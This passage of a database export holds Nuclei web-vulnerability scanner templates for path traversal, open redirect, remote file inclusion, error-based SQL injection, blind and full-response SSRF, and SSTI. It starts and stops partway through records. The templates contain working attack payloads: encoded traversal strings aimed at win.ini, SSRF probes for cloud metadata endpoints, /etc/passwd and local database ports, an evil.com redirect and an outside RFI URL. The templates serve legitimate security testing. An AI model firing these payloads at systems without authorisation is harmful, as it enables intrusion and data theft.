'%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'\n - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'\n - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini'\n - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'\n - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'\n - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'\n - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'\n\n fuzzing:\n - part: query\n type: replace # replaces existing parameter value with fuzz payload\n mode: multiple # replaces all parameters value with fuzz payload\n fuzz:\n - '{{win_fuzz}}'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950", "hash": "f7ff7a534f136638f9d254f3cd7c4705", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c88" }, "name": "open-redirect.yaml", "content": "id: open-redirect\n\ninfo:\n name: Open Redirect Detection\n author: princechaddha\n severity: medium\n tags: redirect,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n redirect:\n - \"evil.com\"\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - AuthState\n - URL\n - _url\n - callback\n - checkout\n - checkout_url\n - content\n - continue\n - continueTo\n - counturl\n - data\n - dest\n - dest_url\n - destination\n - dir\n - document\n - domain\n - done\n - download\n - feed\n - file\n - file_name\n - file_url\n - folder\n - folder_url\n - forward\n - from_url\n - go\n - goto\n - host\n - html\n - http\n - https\n - image\n - image_src\n - image_url\n - imageurl\n - img\n - img_url\n - include\n - langTo\n - load_file\n - load_url\n - login_to\n - login_url\n - logout\n - media\n - navigation\n - next\n - next_page\n - open\n - out\n - page\n - page_url\n - pageurl\n - path\n - picture\n - port\n - proxy\n - r\n - r2\n - redir\n - redirect\n - redirectUri\n - redirectUrl\n - redirect_to\n - redirect_uri\n - redirect_url\n - reference\n - referrer\n - req\n - request\n - ret\n - retUrl\n - return\n - returnTo\n - return_path\n - return_to\n - return_url\n - rt\n - rurl\n - show\n - site\n - source\n - src\n - target\n - to\n - u\n - uri\n - url\n - val\n - validate\n - view\n - window\n - back\n - cgi\n - follow\n - home\n - jump\n - link\n - location\n - menu\n - move\n - nav\n - orig_url\n - out_url\n - query\n - auth\n - callback_url\n - confirm_url\n - destination_url\n - domain_url\n - entry\n - exit\n - forward_url\n - go_to\n - goto_url\n - home_url\n - image_link\n - load\n - logout_url\n - nav_to\n - origin\n - page_link\n - redirect_link\n - ref\n - referrer_url\n - return_link\n - return_to_url\n - source_url\n - target_url\n - to_url\n - validate_url\n - DirectTo\n - relay\n\n fuzz:\n - \"https://{{redirect}}\"\n\n - part: query\n mode: single\n values:\n - \"https?://\" # Replace HTTP URLs with alternatives\n fuzz:\n - \"https://{{redirect}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)evil\\.com\\/?(\\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1\n\n - type: status\n status:\n - 301\n - 302\n - 307\n# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950", "hash": "4267f880d0886742b5af12a11a146a6e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c89" }, "name": "generic-rfi.yaml", "content": "id: generic-rfi\n\ninfo:\n name: Generic Remote File Inclusion\n author: m4lwhere\n severity: high\n reference:\n - https://www.invicti.com/learn/remote-file-inclusion-rfi/\n tags: rfi,dast,oast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n rfi:\n - \"https://rfi.nessus.org/rfi.txt\"\n\n fuzzing:\n - part: query\n mode: single\n fuzz:\n - \"{{rfi}}\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body # Confirms the PHP was executed\n words:\n - \"NessusCodeExecTest\"\n# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950", "hash": "4a0c4b4612991555282b04f7a6418f01", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8a" }, "name": "sqli-error-based.yaml", "content": "id: sqli-error-based\n\ninfo:\n name: Error based SQL Injection\n author: geeknik,pdteam\n severity: critical\n description: |\n Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,\n or to override valuable ones, or even to execute dangerous system level commands on the database host.\n This is accomplished by the application taking user input and combining it with static parameters to build an SQL query .\n tags: sqli,error,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n injection:\n - \"'\"\n - \"\\\"\"\n - \";\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{injection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Adminer\"\n negative: true\n # False Positive\n\n - type: regex\n regex:\n # MySQL\n - \"SQL syntax.*?MySQL\"\n - \"Warning.*?\\\\Wmysqli?_\"\n - \"MySQLSyntaxErrorException\"\n - \"valid MySQL result\"\n - \"check the manual that (corresponds to|fits) your MySQL server version\"\n - \"Unknown column '[^ ]+' in 'field list'\"\n - \"MySqlClient\\\\.\"\n - \"com\\\\.mysql\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Mysqli_Exception\"\n - \"Pdo[./_\\\\\\\\]Mysql\"\n - \"MySqlException\"\n - \"SQLSTATE\\\\[\\\\d+\\\\]: Syntax error or access violation\"\n # MariaDB\n - \"check the manual that (corresponds to|fits) your MariaDB server version\"\n # Drizzle\n - \"check the manual that (corresponds to|fits) your Drizzle server version\"\n # MemSQL\n - \"MemSQL does not support this type of query\"\n - \"is not supported by MemSQL\"\n - \"unsupported nested scalar subselect\"\n # PostgreSQL\n - \"PostgreSQL.*?ERROR\"\n - \"Warning.*?\\\\Wpg_\"\n - \"valid PostgreSQL result\"\n - \"Npgsql\\\\.\"\n - \"PG::SyntaxError:\"\n - \"org\\\\.postgresql\\\\.util\\\\.PSQLException\"\n - \"ERROR:\\\\s\\\\ssyntax error at or near\"\n - \"ERROR: parser: parse error at or near\"\n - \"PostgreSQL query failed\"\n - \"org\\\\.postgresql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Pgsql\"\n - \"PSQLException\"\n # Microsoft SQL Server\n - \"Driver.*? SQL[\\\\-\\\\_\\\\ ]*Server\"\n - \"OLE DB.*? SQL Server\"\n - \"\\\\bSQL Server[^<"]+Driver\"\n - \"Warning.*?\\\\W(mssql|sqlsrv)_\"\n - \"\\\\bSQL Server[^<"]+[0-9a-fA-F]{8}\"\n - \"System\\\\.Data\\\\.SqlClient\\\\.SqlException\\\\.(SqlException|SqlConnection\\\\.OnError)\"\n - \"(?s)Exception.*?\\\\bRoadhouse\\\\.Cms\\\\.\"\n - \"Microsoft SQL Native Client error '[0-9a-fA-F]{8}\"\n - \"\\\\[SQL Server\\\\]\"\n - \"ODBC SQL Server Driver\"\n - \"ODBC Driver \\\\d+ for SQL Server\"\n - \"SQLServer JDBC Driver\"\n - \"com\\\\.jnetdirect\\\\.jsql\"\n - \"macromedia\\\\.jdbc\\\\.sqlserver\"\n - \"Zend_Db_(Adapter|Statement)_Sqlsrv_Exception\"\n - \"com\\\\.microsoft\\\\.sqlserver\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\](Mssql|SqlSrv)\"\n - \"SQL(Srv|Server)Exception\"\n - \"Unclosed quotation mark after the character string\"\n # Microsoft Access\n - \"Microsoft Access (\\\\d+ )?Driver\"\n - \"JET Database Engine\"\n - \"Access Database Engine\"\n - \"ODBC Microsoft Access\"\n - \"Syntax error \\\\(missing operator\\\\) in query expression\"\n # Oracle\n - \"\\\\bORA-\\\\d{5}\"\n - \"Oracle error\"\n - \"Oracle.*?Driver\"\n - \"Warning.*?\\\\W(oci|ora)_\"\n - \"quoted string not properly terminated\"\n - \"SQL command not properly ended\"\n - \"macromedia\\\\.jdbc\\\\.oracle\"\n - \"oracle\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Oracle_Exception\"\n - \"Pdo[./_\\\\\\\\](Oracle|OCI)\"\n - \"OracleException\"\n # IBM DB2\n - \"CLI Driver.*?DB2\"\n - \"DB2 SQL error\"\n - \"\\\\bdb2_\\\\w+\\\\(\"\n - \"SQLCODE[=:\\\\d, -]+SQLSTATE\"\n - \"com\\\\.ibm\\\\.db2\\\\.jcc\"\n - \"Zend_Db_(Adapter|Statement)_Db2_Exception\"\n - \"Pdo[./_\\\\\\\\]Ibm\"\n - \"DB2Exception\"\n - \"ibm_db_dbi\\\\.ProgrammingError\"\n # Informix\n - \"Warning.*?\\\\Wifx_\"\n - \"Exception.*?Informix\"\n - \"Informix ODBC Driver\"\n - \"ODBC Informix driver\"\n - \"com\\\\.informix\\\\.jdbc\"\n - \"weblogic\\\\.jdbc\\\\.informix\"\n - \"Pdo[./_\\\\\\\\]Informix\"\n - \"IfxException\"\n # Firebird\n - \"Dynamic SQL Error\"\n - \"Warning.*?\\\\Wibase_\"\n - \"org\\\\.firebirdsql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Firebird\"\n # SQLite\n - \"SQLite/JDBCDriver\"\n - \"SQLite\\\\.Exception\"\n - \"(Microsoft|System)\\\\.Data\\\\.SQLite\\\\.SQLiteException\"\n - \"Warning.*?\\\\W(sqlite_|SQLite3::)\"\n - \"\\\\[SQLITE_ERROR\\\\]\"\n - \"SQLite error \\\\d+:\"\n - \"sqlite3.OperationalError:\"\n - \"SQLite3::SQLException\"\n - \"org\\\\.sqlite\\\\.JDBC\"\n - \"Pdo[./_\\\\\\\\]Sqlite\"\n - \"SQLiteException\"\n # SAP MaxDB\n - \"SQL error.*?POS([0-9]+)\"\n - \"Warning.*?\\\\Wmaxdb_\"\n - \"DriverSapDB\"\n - \"-3014.*?Invalid end of SQL statement\"\n - \"com\\\\.sap\\\\.dbtech\\\\.jdbc\"\n - \"\\\\[-3008\\\\].*?: Invalid keyword or missing delimiter\"\n # Sybase\n - \"Warning.*?\\\\Wsybase_\"\n - \"Sybase message\"\n - \"Sybase.*?Server message\"\n - \"SybSQLException\"\n - \"Sybase\\\\.Data\\\\.AseClient\"\n - \"com\\\\.sybase\\\\.jdbc\"\n # Ingres\n - \"Warning.*?\\\\Wingres_\"\n - \"Ingres SQLSTATE\"\n - \"Ingres\\\\W.*?Driver\"\n - \"com\\\\.ingres\\\\.gcf\\\\.jdbc\"\n # FrontBase\n - \"Exception (condition )?\\\\d+\\\\. Transaction rollback\"\n - \"com\\\\.frontbase\\\\.jdbc\"\n - \"Syntax error 1. Missing\"\n - \"(Semantic|Syntax) error [1-4]\\\\d{2}\\\\.\"\n # HSQLDB\n - \"Unexpected end of command in statement \\\\[\"\n - \"Unexpected token.*?in statement \\\\[\"\n - \"org\\\\.hsqldb\\\\.jdbc\"\n # H2\n - \"org\\\\.h2\\\\.jdbc\"\n - \"\\\\[42000-192\\\\]\"\n # MonetDB\n - \"![0-9]{5}![^\\\\n]+(failed|unexpected|error|syntax|expected|violation|exception)\"\n - \"\\\\[MonetDB\\\\]\\\\[ODBC Driver\"\n - \"nl\\\\.cwi\\\\.monetdb\\\\.jdbc\"\n # Apache Derby\n - \"Syntax error: Encountered\"\n - \"org\\\\.apache\\\\.derby\"\n - \"ERROR 42X01\"\n # Vertica\n - \", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):\"\n - \"/vertica/Parser/scan\"\n - \"com\\\\.vertica\\\\.jdbc\"\n - \"org\\\\.jkiss\\\\.dbeaver\\\\.ext\\\\.vertica\"\n - \"com\\\\.vertica\\\\.dsi\\\\.dataengine\"\n # Mckoi\n - \"com\\\\.mckoi\\\\.JDBCDriver\"\n - \"com\\\\.mckoi\\\\.database\\\\.jdbc\"\n - \"<REGEX_LITERAL>\"\n # Presto\n - \"com\\\\.facebook\\\\.presto\\\\.jdbc\"\n - \"io\\\\.prestosql\\\\.jdbc\"\n - \"com\\\\.simba\\\\.presto\\\\.jdbc\"\n - \"UNION query has different number of fields: \\\\d+, \\\\d+\"\n # Altibase\n - \"Altibase\\\\.jdbc\\\\.driver\"\n # MimerSQL\n - \"com\\\\.mimer\\\\.jdbc\"\n - \"Syntax error,[^\\\\n]+assumed to mean\"\n # CrateDB\n - \"io\\\\.crate\\\\.client\\\\.jdbc\"\n # Cache\n - \"encountered after end of query\"\n - \"A comparison operator is required here\"\n # Raima Database Manager\n - \"-10048: Syntax error\"\n - \"rdmStmtPrepare\\\\(.+?\\\\) returned\"\n # Virtuoso\n - \"SQ074: Line \\\\d+:\"\n - \"SR185: Undefined procedure\"\n - \"SQ200: No table \"\n - \"Virtuoso S0002 Error\"\n - \"\\\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\\\]\\\\[Virtuoso Server\\\\]\"\n condition: or\n\n extractors:\n - type: regex\n name: mysql\n regex:\n - \"SQL syntax.*?MySQL\"\n - \"Warning.*?\\\\Wmysqli?_\"\n - \"MySQLSyntaxErrorException\"\n - \"valid MySQL result\"\n - \"check the manual that (corresponds to|fits) your MySQL server version\"\n - \"Unknown column '[^ ]+' in 'field list'\"\n - \"MySqlClient\\\\.\"\n - \"com\\\\.mysql\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Mysqli_Exception\"\n - \"Pdo[./_\\\\\\\\]Mysql\"\n - \"MySqlException\"\n - \"SQLSTATE[\\\\d+]: Syntax error or access violation\"\n\n - type: regex\n name: mariadb\n regex:\n - \"check the manual that (corresponds to|fits) your MariaDB server version\"\n\n - type: regex\n name: drizzel\n regex:\n - \"check the manual that (corresponds to|fits) your Drizzle server version\"\n\n - type: regex\n name: memsql\n regex:\n - \"MemSQL does not support this type of query\"\n - \"is not supported by MemSQL\"\n - \"unsupported nested scalar subselect\"\n\n - type: regex\n name: postgresql\n regex:\n - \"PostgreSQL.*?ERROR\"\n - \"Warning.*?\\\\Wpg_\"\n - \"valid PostgreSQL result\"\n - \"Npgsql\\\\.\"\n - \"PG::SyntaxError:\"\n - \"org\\\\.postgresql\\\\.util\\\\.PSQLException\"\n - \"ERROR:\\\\s\\\\ssyntax error at or near\"\n - \"ERROR: parser: parse error at or near\"\n - \"PostgreSQL query failed\"\n - \"org\\\\.postgresql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Pgsql\"\n - \"PSQLException\"\n\n - type: regex\n name: microsoftsqlserver\n regex:\n - \"Driver.*? SQL[\\\\-\\\\_\\\\ ]*Server\"\n - \"OLE DB.*? SQL Server\"\n - \"\\\\bSQL Server[^<"]+Driver\"\n - \"Warning.*?\\\\W(mssql|sqlsrv)_\"\n - \"\\\\bSQL Server[^<"]+[0-9a-fA-F]{8}\"\n - \"System\\\\.Data\\\\.SqlClient\\\\.SqlException\\\\.(SqlException|SqlConnection\\\\.OnError)\"\n - \"(?s)Exception.*?\\\\bRoadhouse\\\\.Cms\\\\.\"\n - \"Microsoft SQL Native Client error '[0-9a-fA-F]{8}\"\n - \"\\\\[SQL Server\\\\]\"\n - \"ODBC SQL Server Driver\"\n - \"ODBC Driver \\\\d+ for SQL Server\"\n - \"SQLServer JDBC Driver\"\n - \"com\\\\.jnetdirect\\\\.jsql\"\n - \"macromedia\\\\.jdbc\\\\.sqlserver\"\n - \"Zend_Db_(Adapter|Statement)_Sqlsrv_Exception\"\n - \"com\\\\.microsoft\\\\.sqlserver\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\](Mssql|SqlSrv)\"\n - \"SQL(Srv|Server)Exception\"\n - \"Unclosed quotation mark after the character string\"\n\n - type: regex\n name: microsoftaccess\n regex:\n - \"Microsoft Access (\\\\d+ )?Driver\"\n - \"JET Database Engine\"\n - \"Access Database Engine\"\n - \"ODBC Microsoft Access\"\n - \"Syntax error \\\\(missing operator\\\\) in query expression\"\n\n - type: regex\n name: oracle\n regex:\n - \"\\\\bORA-\\\\d{5}\"\n - \"Oracle error\"\n - \"Oracle.*?Driver\"\n - \"Warning.*?\\\\W(oci|ora)_\"\n - \"quoted string not properly terminated\"\n - \"SQL command not properly ended\"\n - \"macromedia\\\\.jdbc\\\\.oracle\"\n - \"oracle\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Oracle_Exception\"\n - \"Pdo[./_\\\\\\\\](Oracle|OCI)\"\n - \"OracleException\"\n\n - type: regex\n name: ibmdb2\n regex:\n - \"CLI Driver.*?DB2\"\n - \"DB2 SQL error\"\n - \"\\\\bdb2_\\\\w+\\\\(\"\n - \"SQLCODE[=:\\\\d, -]+SQLSTATE\"\n - \"com\\\\.ibm\\\\.db2\\\\.jcc\"\n - \"Zend_Db_(Adapter|Statement)_Db2_Exception\"\n - \"Pdo[./_\\\\\\\\]Ibm\"\n - \"DB2Exception\"\n - \"ibm_db_dbi\\\\.ProgrammingError\"\n\n - type: regex\n name: informix\n regex:\n - \"Warning.*?\\\\Wifx_\"\n - \"Exception.*?Informix\"\n - \"Informix ODBC Driver\"\n - \"ODBC Informix driver\"\n - \"com\\\\.informix\\\\.jdbc\"\n - \"weblogic\\\\.jdbc\\\\.informix\"\n - \"Pdo[./_\\\\\\\\]Informix\"\n - \"IfxException\"\n\n - type: regex\n name: firebird\n regex:\n - \"Dynamic SQL Error\"\n - \"Warning.*?\\\\Wibase_\"\n - \"org\\\\.firebirdsql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Firebird\"\n\n - type: regex\n name: sqlite\n regex:\n - \"SQLite/JDBCDriver\"\n - \"SQLite\\\\.Exception\"\n - \"(Microsoft|System)\\\\.Data\\\\.SQLite\\\\.SQLiteException\"\n - \"Warning.*?\\\\W(sqlite_|SQLite3::)\"\n - \"\\\\[SQLITE_ERROR\\\\]\"\n - \"SQLite error \\\\d+:\"\n - \"sqlite3.OperationalError:\"\n - \"SQLite3::SQLException\"\n - \"org\\\\.sqlite\\\\.JDBC\"\n - \"Pdo[./_\\\\\\\\]Sqlite\"\n - \"SQLiteException\"\n\n - type: regex\n name: sapmaxdb\n regex:\n - \"SQL error.*?POS([0-9]+)\"\n - \"Warning.*?\\\\Wmaxdb_\"\n - \"DriverSapDB\"\n - \"-3014.*?Invalid end of SQL statement\"\n - \"com\\\\.sap\\\\.dbtech\\\\.jdbc\"\n - \"\\\\[-3008\\\\].*?: Invalid keyword or missing delimiter\"\n\n - type: regex\n name: sybase\n regex:\n - \"Warning.*?\\\\Wsybase_\"\n - \"Sybase message\"\n - \"Sybase.*?Server message\"\n - \"SybSQLException\"\n - \"Sybase\\\\.Data\\\\.AseClient\"\n - \"com\\\\.sybase\\\\.jdbc\"\n\n - type: regex\n name: ingres\n regex:\n - \"Warning.*?\\\\Wingres_\"\n - \"Ingres SQLSTATE\"\n - \"Ingres\\\\W.*?Driver\"\n - \"com\\\\.ingres\\\\.gcf\\\\.jdbc\"\n\n - type: regex\n name: frontbase\n regex:\n - \"Exception (condition )?\\\\d+\\\\. Transaction rollback\"\n - \"com\\\\.frontbase\\\\.jdbc\"\n - \"Syntax error 1. Missing\"\n - \"(Semantic|Syntax) error \\\\[1-4\\\\]\\\\d{2}\\\\.\"\n\n - type: regex\n name: hsqldb\n regex:\n - \"Unexpected end of command in statement \\\\[\"\n - \"Unexpected token.*?in statement \\\\[\"\n - \"org\\\\.hsqldb\\\\.jdbc\"\n\n - type: regex\n name: h2\n regex:\n - \"org\\\\.h2\\\\.jdbc\"\n - \"\\\\[42000-192\\\\]\"\n\n - type: regex\n name: monetdb\n regex:\n - \"![0-9]{5}![^\\\\n]+(failed|unexpected|error|syntax|expected|violation|exception)\"\n - \"\\\\[MonetDB\\\\]\\\\[ODBC Driver\"\n - \"nl\\\\.cwi\\\\.monetdb\\\\.jdbc\"\n\n - type: regex\n name: apachederby\n regex:\n - \"Syntax error: Encountered\"\n - \"org\\\\.apache\\\\.derby\"\n - \"ERROR 42X01\"\n\n - type: regex\n name: vertica\n regex:\n - \", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):\"\n - \"/vertica/Parser/scan\"\n - \"com\\\\.vertica\\\\.jdbc\"\n - \"org\\\\.jkiss\\\\.dbeaver\\\\.ext\\\\.vertica\"\n - \"com\\\\.vertica\\\\.dsi\\\\.dataengine\"\n\n - type: regex\n name: mckoi\n regex:\n - \"com\\\\.mckoi\\\\.JDBCDriver\"\n - \"com\\\\.mckoi\\\\.database\\\\.jdbc\"\n - \"<REGEX_LITERAL>\"\n\n - type: regex\n name: presto\n regex:\n - \"com\\\\.facebook\\\\.presto\\\\.jdbc\"\n - \"io\\\\.prestosql\\\\.jdbc\"\n - \"com\\\\.simba\\\\.presto\\\\.jdbc\"\n - \"UNION query has different number of fields: \\\\d+, \\\\d+\"\n\n - type: regex\n name: altibase\n regex:\n - \"Altibase\\\\.jdbc\\\\.driver\"\n\n - type: regex\n name: mimersql\n regex:\n - \"com\\\\.mimer\\\\.jdbc\"\n - \"Syntax error,[^\\\\n]+assumed to mean\"\n\n - type: regex\n name: cratedb\n regex:\n - \"io\\\\.crate\\\\.client\\\\.jdbc\"\n\n - type: regex\n name: cache\n regex:\n - \"encountered after end of query\"\n - \"A comparison operator is required here\"\n\n - type: regex\n name: raimadatabasemanager\n regex:\n - \"-10048: Syntax error\"\n - \"rdmStmtPrepare\\\\(.+?\\\\) returned\"\n\n - type: regex\n name: virtuoso\n regex:\n - \"SQ074: Line \\\\d+:\"\n - \"SR185: Undefined procedure\"\n - \"SQ200: No table \"\n - \"Virtuoso S0002 Error\"\n - \"\\\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\\\]\\\\[Virtuoso Server\\\\]\"\n# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950", "hash": "c8a1ce309d14941b256c497e5e8beec5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8b" }, "name": "blind-ssrf.yaml", "content": "id: blind-ssrf\n\ninfo:\n name: Blind SSRF OAST Detection\n author: pdteam\n severity: medium\n tags: ssrf,dast,oast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n ssrf:\n - \"{{interactsh-url}}\"\n - \"{{FQDN}}.{{interactsh-url}}\"\n - \"{{RDN}}.{{interactsh-url}}\"\n\n fuzzing:\n - part: query\n mode: single\n values:\n - \"https?://\" # Replace HTTP URLs with alternatives\n fuzz:\n - \"https://{{ssrf}}\"\n\n - part: query\n mode: single\n values:\n - \"^[A-Za-z0-9-._]+:[0-9]+$\" # Replace : with alternative\n fuzz:\n - \"{{ssrf}}:80\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950", "hash": "fedd9b3ab5aa3a7bc4f5e4f1200bd7b2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8c" }, "name": "response-ssrf.yaml", "content": "id: response-ssrf\n\ninfo:\n name: Full Response SSRF Detection\n author: pdteam,pwnhxl,j4vaovo\n severity: high\n reference:\n - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py\n tags: ssrf,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n ssrf:\n - 'http://{{interactsh-url}}'\n - 'http://{{FQDN}}.{{interactsh-url}}'\n - 'http://{{RDN}}.{{interactsh-url}}'\n - 'file:////./etc/./passwd'\n - 'file:///c:/./windows/./win.ini'\n - 'http://metadata.tencentyun.com/latest/meta-data/'\n - 'http://100.100.100.200/latest/meta-data/'\n - 'http://169.254.169.254/latest/meta-data/'\n - 'http://169.254.169.254/metadata/v1'\n - 'http://127.0.0.1:22'\n - 'http://127.0.0.1:3306'\n - 'dict://127.0.0.1:6379/info'\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - callback\n - continue\n - data\n - dest\n - dir\n - domain\n - feed\n - file\n - host\n - html\n - imgurl\n - navigation\n - next\n - open\n - out\n - page\n - path\n - port\n - redirect\n - reference\n - return\n - show\n - site\n - to\n - uri\n - url\n - val\n - validate\n - view\n - window\n fuzz:\n - \"{{ssrf}}\"\n\n - part: query\n mode: single\n values:\n - \"(https|http|file)(%3A%2F%2F|://)(.*?)\"\n fuzz:\n - \"{{ssrf}}\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: regex\n part: body\n regex:\n - 'SSH-(\\d.\\d)-OpenSSH_(\\d.\\d)'\n\n - type: regex\n part: body\n regex:\n - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'\n\n - type: regex\n part: body\n regex:\n - '(\\d.\\d.\\d)(.*?)mysql_native_password'\n\n - type: regex\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n\n - type: regex\n part: body\n regex:\n - 'dns-conf\\/[\\s\\S]+instance\\/'\n\n - type: regex\n part: body\n regex:\n - 'app-id[\\s\\S]+placement\\/'\n\n - type: regex\n part: body\n regex:\n - 'ami-id[\\s\\S]+placement\\/'\n\n - type: regex\n part: body\n regex:\n - 'id[\\s\\S]+interfaces\\/'\n# digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950", "hash": "f35a663490050a1e57bc67c8207c0896", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8d" }, "name": "reflection-ssti.yaml", "content": "id: reflection-ssti\n\ninfo:\n name: Reflected SSTI Arithmetic Based\n author: pdteam\n severity: medium\n reference:\n - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java\n - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update\n tags: ssti,dast\n\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n skip-variables-check: true\n payloads:\n ssti:\n - '{{concat(\"${\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"{{\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"<%=\", \"{{first}}*{{second}}\", \"%>\")}}'\n - '{{concat(\"{\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"{{{\", \"{{first}}*{{second}}\", \"}}}\")}}'\n - '{{concat(\"${{\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"#{\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"[[\", \"{{first}}*{{second}}\", \"]]\")}}'\n - '{{concat(\"{{=\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"[[${\", \"{{first}}*{{second}}\", \"}]]\")}}'\n - '{{concat(\"${xyz|\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"#set($x=\", \"{{first}}*{{second}}\", \")${x}\")}}'\n - '{{concat(\"@(\", 